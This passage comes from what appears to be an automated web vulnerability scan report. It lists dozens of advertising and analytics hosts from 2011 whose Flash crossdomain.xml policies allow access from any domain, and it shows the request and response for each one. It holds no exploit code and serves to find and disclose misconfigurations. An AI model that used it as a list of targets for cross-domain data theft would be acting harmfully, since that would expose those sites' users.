Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.16. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 14:56:31 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

4.17. http://cdn5.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 18
Content-Type: text/xml
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.18. http://clk.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.19. http://content.links.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.links.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
ETag: "eb20ee82e722c81:2813"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:40 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

4.20. http://content.plymedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.plymedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.plymedia.com

Response

HTTP/1.0 200 OK
Cache-Control: public, max-age=25
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:13:26 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:00 GMT
Content-Length: 682
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.21. http://core.insightexpressai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Tue, 06 Sep 2011 14:57:00 GMT
Content-Length: 139
Connection: close
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

4.22. http://d.adroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:14 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 24 Aug 2011 20:02:16 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.23. http://d.ads.readwriteweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.ads.readwriteweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.ads.readwriteweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:46 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "49c238-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.24. http://d1.openx.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "78412-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/xml
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.25. http://d7.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6034
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.26. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 00:24:57 GMT
Expires: Wed, 07 Sep 2011 00:24:57 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 60104

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.27. http://goku.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://goku.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goku.brightcove.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:13:00 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 116
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.28. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2b9b"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web202
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:33 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

4.29. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 15:32:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 15:32:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.30. http://img-cdn.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.31. http://imp.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.32. http://intelligence.marykay.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://intelligence.marykay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
xserver: www28
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.33. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:45:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.34. http://l.betrad.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:59:07 GMT
ETag: "4ded34bc=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Mon, 06 Jun 2011 20:12:44 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

4.35. http://load.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1315229954000"
Last-Modified: Mon, 05 Sep 2011 13:39:14 GMT
host: rcv-srv33
Content-Type: application/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 16:13:01 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.36. http://log30.doubleverify.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:53 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.37. http://netsuite.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://netsuite.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: netsuite.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 15:32:28 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.38. http://network.realmedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: network.realmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT
ETag: "18d11d-d0-4666d0056ce80"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 15:35:10 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.39. http://now.eloqua.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 06 Sep 2011 15:32:12 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.40. http://oimg.m.cnbc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.m.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oimg.m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:49 GMT
Server: Omniture DC/2.0.0
xserver: www282
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.41. http://oimg.nbcuni.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oimg.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oimg.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:45 GMT
Server: Omniture DC/2.0.0
xserver: www78
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.42. http://omni.csc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.csc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omni.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www614
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.43. http://oracle.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracle.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracle.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:06 GMT
Server: Omniture DC/2.0.0
xserver: www423
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.44. http://oracleglobal.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:27 GMT
Server: Omniture DC/2.0.0
xserver: www93
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.45. http://oracleuniversity.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracleuniversity.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:45 GMT
Server: Omniture DC/2.0.0
xserver: www431
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.46. http://p.brilig.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:30 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jul 2011 01:19:04 GMT
ETag: "55fb9-ab-4a861e6c7f200"
Accept-Ranges: bytes
Content-Length: 171
X-Brilig-D: D=74
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>

4.47. http://pg.links.channelintelligence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pg.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
ETag: "eb20ee82e722c81:2faa"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Tue, 06 Sep 2011 16:45:35 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />    
</cross-domain-polic
...[SNIP]...

4.48. http://pg.links.origin.channelintelligence.com/crossdomain.xml

Summary

